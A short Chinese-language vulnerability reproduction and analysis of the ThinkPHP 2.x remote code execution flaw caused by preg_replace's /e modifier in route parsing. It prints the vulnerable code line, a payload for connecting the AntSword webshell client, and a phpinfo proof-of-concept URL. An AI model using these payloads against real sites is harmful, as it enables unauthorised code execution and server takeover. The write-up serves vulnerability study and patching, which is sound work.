一、漏洞简介
ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2";', implode($depr,$paths));导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
二、漏洞影响
Thinkphp 2.x的版本
三、漏洞复现
1.访问漏洞页面
?2.蚁剑链接 pyload: /index.php/a/b/c/${@print(($_POST[123]))}
?
?
漏洞分析
preg_replace这个函数是个替换函数,而且支持正则,使用方式如下:
preg_replace('正则规则','替换字符','目标字符')
1、e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;
2、/e 可执行模式,此为PHP专有参数,例如preg_replace函数。
这里的preg_replace函数如下:
1、$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
用户输入的字符会插入到"\2",此处的双引号中进行执行
事实上payload:/index.php?s=/xxx/xxx/xxx/${@phpinfo()},这样即可运行了!